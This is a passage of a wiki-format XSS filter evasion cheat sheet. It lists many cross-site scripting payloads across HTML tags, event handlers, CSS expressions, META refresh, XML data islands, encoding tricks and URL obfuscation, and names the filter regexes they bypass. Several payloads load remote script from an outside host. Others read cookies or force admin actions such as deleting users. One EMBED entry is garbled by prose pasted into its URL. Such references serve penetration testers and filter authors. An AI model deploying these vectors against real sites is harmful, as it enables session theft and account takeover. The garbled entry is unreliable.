Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here:

<nowiki><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")></nowiki>

Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.

<nowiki><SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

== Extraneous open brackets ==
Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error:
<<SCRIPT>alert("XSS");//<</SCRIPT>

== No closing script tags ==
In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:

<nowiki><SCRIPT SRC=http://ha.ckers.org/xss.js?< B ></nowiki>

== Protocol resolution in script tags ==
This particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT tag.

<SCRIPT SRC=//ha.ckers.org/.j>

== Half open HTML/JavaScript XSS vector ==
Unlike Firefox the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close ">" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also affective against a real world XSS filter I came across using an open ended <IFRAME tag instead of an <IMG tag:

<IMG SRC="javascript:alert('XSS')"

== Double open angle brackets ==
Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:

<nowiki><iframe src=http://ha.ckers.org/scriptlet.html <</nowiki>

== Escaping JavaScript escapes ==
When the application is written to output some user information inside of a JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this is gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT> which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:

\";alert('XSS');//

== End title tag ==
This is a simple XSS vector that closes <TITLE> tags, which can encapsulate the malicious cross site scripting attack:

<nowiki></TITLE><SCRIPT>alert("XSS");</SCRIPT></nowiki>

==INPUT image ==
<nowiki><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"></nowiki>

== BODY image ==
<nowiki><BODY BACKGROUND="javascript:alert('XSS')"></nowiki>

== IMG Dynsrc ==
<nowiki><IMG DYNSRC="javascript:alert('XSS')"></nowiki>

== IMG lowsrc ==
<nowiki><IMG LOWSRC="javascript:alert('XSS')"></nowiki>

== List-style-image ==
Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:

<nowiki><STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br></nowiki>

== VBscript in an image ==
<nowiki><IMG SRC='vbscript:msgbox("XSS")'></nowiki>

== Livescript (older versions of Netscape only) ==
<nowiki><IMG SRC="livescript:[code]"></nowiki>

== BODY tag ==
Method doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):

<nowiki><BODY ONLOAD=alert('XSS')></nowiki>

== Event Handlers ==

It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.

The [http://help.dottoro.com/ Dottoro Web Reference] also has a nice [http://help.dottoro.com/ljfvvdnm.php list of events in JavaScript].

# <code>FSCommand()</code> (attacker can use this when executed from within an embedded Flash object)
# <code>onAbort()</code> (when user aborts the loading of an image)
# <code>onActivate()</code> (when object is set as the active element)
# <code>onAfterPrint()</code> (activates after user prints or previews print job)
# <code>onAfterUpdate()</code> (activates on data object after updating data in the source object)
# <code>onBeforeActivate()</code> (fires before the object is set as the active element)
# <code>onBeforeCopy()</code> (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the <code>execCommand("Copy")</code> function)
# <code>onBeforeCut()</code> (attacker executes the attack string right before a selection is cut)
# <code>onBeforeDeactivate()</code> (fires right after the activeElement is changed from the current object)
# <code>onBeforeEditFocus()</code> (Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected)
# <code>onBeforePaste()</code> (user needs to be tricked into pasting or be forced into it using the <code>execCommand("Paste")</code> function)
# <code>onBeforePrint()</code> (user would need to be tricked into printing or attacker could use the <code>print()</code> or <code>execCommand("Print")</code> function).
# <code>onBeforeUnload()</code> (user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent)
# <code>onBeforeUpdate()</code> (activates on data object before updating data in the source object)
# <code>onBegin()</code> (the onbegin event fires immediately when the element's timeline begins)
# <code>onBlur()</code> (in the case where another popup is loaded and window looses focus)
# <code>onBounce()</code> (fires when the behavior property of the marquee object is set to "alternate" and the contents of the marquee reach one side of the window)
# <code>onCellChange()</code> (fires when data changes in the data provider)
# <code>onChange()</code> (select, text, or TEXTAREA field loses focus and its value has been modified)
# <code>onClick()</code> (someone clicks on a form)
# <code>onContextMenu()</code> (user would need to right click on attack area)
# <code>onControlSelect()</code> (fires when the user is about to make a control selection of the object)
# <code>onCopy()</code> (user needs to copy something or it can be exploited using the <code>execCommand("Copy")</code> command)
# <code>onCut()</code> (user needs to copy something or it can be exploited using the <code>execCommand("Cut")</code> command)
# <code>onDataAvailable()</code> (user would need to change data in an element, or attacker could perform the same function)
# <code>onDataSetChanged()</code> (fires when the data set exposed by a data source object changes)
# <code>onDataSetComplete()</code> (fires to indicate that all data is available from the data source object)
# <code>onDblClick()</code> (user double-clicks a form element or a link)
# <code>onDeactivate()</code> (fires when the activeElement is changed from the current object to another object in the parent document)
# <code>onDrag()</code> (requires that the user drags an object)
# <code>onDragEnd()</code> (requires that the user drags an object)
# <code>onDragLeave()</code> (requires that the user drags an object off a valid location)
# <code>onDragEnter()</code> (requires that the user drags an object into a valid location)
# <code>onDragOver()</code> (requires that the user drags an object into a valid location)
# <code>onDragDrop()</code> (user drops an object (e.g. file) onto the browser window)
# <code>onDragStart()</code> (occurs when user starts drag operation)
# <code>onDrop()</code> (user drops an object (e.g. file) onto the browser window)
# <code>onEnd()</code> (the onEnd event fires when the timeline ends.
# <code>onError()</code> (loading of a document or image causes an error)
# <code>onErrorUpdate()</code> (fires on a databound object when an error occurs while updating the associated data in the data source object)
# <code>onFilterChange()</code> (fires when a visual filter completes state change)
# <code>onFinish()</code> (attacker can create the exploit when marquee is finished looping)
# <code>onFocus()</code> (attacker executes the attack string when the window gets focus)
# <code>onFocusIn()</code> (attacker executes the attack string when window gets focus)
# <code>onFocusOut()</code> (attacker executes the attack string when window looses focus)
# <code>onHashChange()</code> (fires when the fragment identifier part of the document's current address changed)
# <code>onHelp()</code> (attacker executes the attack string when users hits F1 while the window is in focus)
# <code>onInput()</code> (the text content of an element is changed through the user interface)
# <code>onKeyDown()</code> (user depresses a key)
# <code>onKeyPress()</code> (user presses or holds down a key)
# <code>onKeyUp()</code> (user releases a key)
# <code>onLayoutComplete()</code> (user would have to print or print preview)
# <code>onLoad()</code> (attacker executes the attack string after the window loads)
# <code>onLoseCapture()</code> (can be exploited by the <code>releaseCapture()</code> method)
# <code>onMediaComplete()</code> (When a streaming media file is used, this event could fire before the file starts playing)
# <code>onMediaError()</code> (User opens a page in the browser that contains a media file, and the event fires when there is a problem)
# <code>onMessage()</code> (fire when the document received a message)
# <code>onMouseDown()</code> (the attacker would need to get the user to click on an image)
# <code>onMouseEnter()</code> (cursor moves over an object or area)
# <code>onMouseLeave()</code> (the attacker would need to get the user to mouse over an image or table and then off again)
# <code>onMouseMove()</code> (the attacker would need to get the user to mouse over an image or table)
# <code>onMouseOut()</code> (the attacker would need to get the user to mouse over an image or table and then off again)
# <code>onMouseOver()</code> (cursor moves over an object or area)
# <code>onMouseUp()</code> (the attacker would need to get the user to click on an image)
# <code>onMouseWheel()</code> (the attacker would need to get the user to use their mouse wheel)
# <code>onMove()</code> (user or attacker would move the page)
# <code>onMoveEnd()</code> (user or attacker would move the page)
# <code>onMoveStart()</code> (user or attacker would move the page)
# <code>onOffline()</code> (occurs if the browser is working in online mode and it starts to work offline)
# <code>onOnline()</code> (occurs if the browser is working in offline mode and it starts to work online)
# <code>onOutOfSync()</code> (interrupt the element's ability to play its media as defined by the timeline)
# <code>onPaste()</code> (user would need to paste or attacker could use the <code>execCommand("Paste")</code> function)
# <code>onPause()</code> (the onpause event fires on every element that is active when the timeline pauses, including the body element)
# <code>onPopState()</code> (fires when user navigated the session history)
# <code>onProgress()</code> (attacker would use this as a flash movie was loading)
# <code>onPropertyChange()</code> (user or attacker would need to change an element property)
# <code>onReadyStateChange()</code> (user or attacker would need to change an element property)
# <code>onRedo()</code> (user went forward in undo transaction history)
# <code>onRepeat()</code> (the event fires once for each repetition of the timeline, excluding the first full cycle)
# <code>onReset()</code> (user or attacker resets a form)
# <code>onResize()</code> (user would resize the window; attacker could auto initialize with something like: <code><SCRIPT>self.resizeTo(500,400);</SCRIPT></code>)
# <code>onResizeEnd()</code> (user would resize the window; attacker could auto initialize with something like: <code><SCRIPT>self.resizeTo(500,400);</SCRIPT></code>)
# <code>onResizeStart()</code> (user would resize the window; attacker could auto initialize with something like: <code><SCRIPT>self.resizeTo(500,400);</SCRIPT></code>)
# <code>onResume()</code> (the onresume event fires on every element that becomes active when the timeline resumes, including the body element)
# <code>onReverse()</code> (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
# <code>onRowsEnter()</code> (user or attacker would need to change a row in a data source)
# <code>onRowExit()</code> (user or attacker would need to change a row in a data source)
# <code>onRowDelete()</code> (user or attacker would need to delete a row in a data source)
# <code>onRowInserted()</code> (user or attacker would need to insert a row in a data source)
# <code>onScroll()</code> (user would need to scroll, or attacker could use the <code>scrollBy()</code> function)
# <code>onSeek()</code> (the onreverse event fires when the timeline is set to play in any direction other than forward)
# <code>onSelect()</code> (user needs to select some text - attacker could auto initialize with something like: <code>window.document.execCommand("SelectAll");</code>)
# <code>onSelectionChange()</code> (user needs to select some text - attacker could auto initialize with something like: <code>window.document.execCommand("SelectAll");</code>)
# <code>onSelectStart()</code> (user needs to select some text - attacker could auto initialize with something like: <code>window.document.execCommand("SelectAll");</code>)
# <code>onStart()</code> (fires at the beginning of each marquee loop)
# <code>onStop()</code> (user would need to press the stop button or leave the webpage)
# <code>onStorage()</code> (storage area changed)
# <code>onSyncRestored()</code> (user interrupts the element's ability to play its media as defined by the timeline to fire)
# <code>onSubmit()</code> (requires attacker or user submits a form)
# <code>onTimeError()</code> (user or attacker sets a time property, such as dur, to an invalid value)
# <code>onTrackChange()</code> (user or attacker changes track in a playList)
# <code>onUndo()</code> (user went backward in undo transaction history)
# <code>onUnload()</code> (as the user clicks any link or presses the back button or attacker forces a click)
# <code>onURLFlip()</code> (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
# <code>seekSegmentTime()</code> (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)

== BGSOUND ==
<BGSOUND SRC="javascript:alert('XSS');">

== & JavaScript includes ==
<nowiki><BR SIZE="&{alert('XSS')}"></nowiki>
== STYLE sheet ==
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

== Remote style sheet ==
(using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
<nowiki><LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"></nowiki>

== Remote style sheet part 2 ==
This works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:

<nowiki><STYLE>@import'http://ha.ckers.org/xss.css';</STYLE></nowiki>

== Remote style sheet part 3 ==
This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <nowiki><http://ha.ckers.org/xss.css>; REL=stylesheet)</nowiki> and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:

<nowiki><META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"></nowiki>

== Remote style sheet part 4 ==
This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
<nowiki><STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE></nowiki>

== STYLE tags with broken up JavaScript for XSS ==
This XSS at times sends IE into an infinite loop of alerts:
<nowiki><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></nowiki>

== STYLE attribute using a comment to break up expression ==
Created by Roman Ivanov
<nowiki><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></nowiki>

== IMG STYLE with expression ==
This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
<nowiki>exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'></nowiki>

== STYLE tag (Older versions of Netscape only)==
<nowiki><STYLE TYPE="text/javascript">alert('XSS');</STYLE></nowiki>

== STYLE tag using background-image ==
<nowiki><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></nowiki>

== STYLE tag using background ==
<nowiki><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></nowiki>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

== Anonymous HTML with STYLE attribute ==
IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
<nowiki><XSS STYLE="xss:expression(alert('XSS'))"></nowiki>

== Local htc file ==
This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
<XSS STYLE="behavior: url(xss.htc);">

== US-ASCII encoding ==
US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.

¼script¾alert(¢XSS¢)¼/script¾

== META ==
The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:

<nowiki><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></nowiki>

=== META using data ===
Directive URL scheme. This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details or go here or here to encode your own. You can also use the XSS [http://ha.ckers.org/xsscalc.html calculator] below if you just want to encode raw HTML or JavaScript as it has a Base64 encoding method:

<nowiki><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></nowiki>

=== META with additional URL parameter ===
If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):

<nowiki><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></nowiki>

== IFRAME ==
If iframes are allowed there are a lot of other XSS problems as well:
<nowiki><IFRAME SRC="javascript:alert('XSS');"></IFRAME></nowiki>

== IFRAME Event based ==
IFrames and most other elements can use event based mayhem like the following...
(Submitted by: David Cross)
<nowiki><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME></nowiki>

== FRAME ==
Frames have the same sorts of XSS problems as iframes
<nowiki><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></nowiki>

== TABLE ==
<nowiki><TABLE BACKGROUND="javascript:alert('XSS')"></nowiki>

=== TD ===
Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<nowiki><TABLE><TD BACKGROUND="javascript:alert('XSS')"></nowiki>

== DIV ==

=== DIV background-image===
<nowiki><DIV STYLE="background-image: url(javascript:alert('XSS'))"></nowiki>

=== DIV background-image with unicoded XSS exploit ===
This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

=== DIV background-image plus extra characters ===
Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):

<nowiki><DIV STYLE="background-image: url(javascript:alert('XSS'))"></nowiki>

=== DIV expression ===
A variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":
<nowiki><DIV STYLE="width: expression(alert('XSS'));"></nowiki>

== Downlevel-Hidden block ==
Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:

<nowiki></nowiki>

== BASE tag ==
Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):
<nowiki><BASE HREF="javascript:alert('XSS');//"></nowiki>

== OBJECT tag ==
If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:

<nowiki><OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT></nowiki>

== Using an EMBED tag you can embed a Flash movie that contains XSS ==
Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
<nowiki>EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
org/xss.swf" AllowScriptAccess="always"></EMBED></nowiki>

== You can EMBED SVG which can contain your XSS vector ==
This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
<nowiki><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></nowiki>

== Using ActionScript inside flash can obfuscate your XSS vector ==

<nowiki>a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);</nowiki>

== XML data island with CDATA obfuscation ==
This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:

<nowiki><XML ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></nowiki>

== Locally hosted XML with embedded JavaScript that is generated using an XML data island ==
This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:

<nowiki><XML SRC="xsstest.xml" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></nowiki>

== HTML+TIME in XML ==
This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
<nowiki><HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML></nowiki>

== Assuming you can only fit in a few characters and it filters against ".js" ==
you can rename your JavaScript file to an image as an XSS vector:
<nowiki><SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT></nowiki>

== SSI (Server Side Includes)==
This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<nowiki></nowiki>

== PHP ==
Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:

<nowiki><? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?></nowiki>

== IMG Embedded commands ==
This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
<nowiki><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></nowiki>

=== IMG Embedded commands part II ===
This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):

<nowiki>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</nowiki>

== Cookie manipulation ==
Admittidly this is pretty obscure but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):

<nowiki><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></nowiki>

== UTF-7 encoding ==
If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
<nowiki><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</nowiki>

== XSS using HTML quote encapsulation ==
This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i":
<nowiki><SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):
<nowiki><SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":

<nowiki><SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT> tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):
<nowiki><SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):
<nowiki><SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
<nowiki><SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

<nowiki><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT></nowiki>

== URL string evasion ==
Assuming "http://www.google.com/" is pro grammatically disallowed:

=== IP verses hostname ===
<nowiki><A HREF="http://66.102.7.147/">XSS</A></nowiki>

=== URL encoding ===
<nowiki><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></nowiki>

=== Dword encoding ===
(Note: there are other of variations of Dword encoding - see the IP Obfuscation calculator below for more details):
<nowiki><A HREF="http://1113982867/">XSS</A></nowiki>

=== Hex encoding ===
The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex quotet is not required):
<nowiki><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></nowiki>

=== Octal encoding ===
Again padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...:
<nowiki><A HREF="http://0102.0146.0007.00000223/">XSS</A></nowiki>

=== Mixed encoding ===
Let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

<nowiki><A HREF="h
tt p://6	6.000146.0x7.147/">XSS</A></nowiki>

=== Protocol resolution bypass ===
(// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.
<nowiki><A HREF="//www.google.com/">XSS</A></nowiki>

=== Google "feeling lucky" part 1. ===
Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatinate several keywords by using something like the following "keyword:XSS+RSnake" for instance. This no longer works within Firefox as of 2.0.

<nowiki><A HREF="//google">XSS</A></nowiki>

=== Google "feeling lucky" part 2.===
This uses a very tiny trick that appears to work Firefox only, because if it's implementation of the "feeling lucky" function. Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:
<nowiki><A HREF="http://ha.ckers.org@google">XSS</A></nowiki>

=== Google "feeling lucky" part 3. ===
This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):
<nowiki><A HREF="http://google:ha.ckers.org">XSS</A></nowiki>

=== Removing cnames ===
When combined with the above URL, removing "www." will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly):
<nowiki><A HREF="http://google.com/">XSS</A></nowiki>

=== Extra dot for absolute DNS:===
<nowiki><A HREF="http://www.google.com./">XSS</A></nowiki>

=== JavaScript link location: ===
<nowiki><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></nowiki>

=== Content replace as attack vector ===
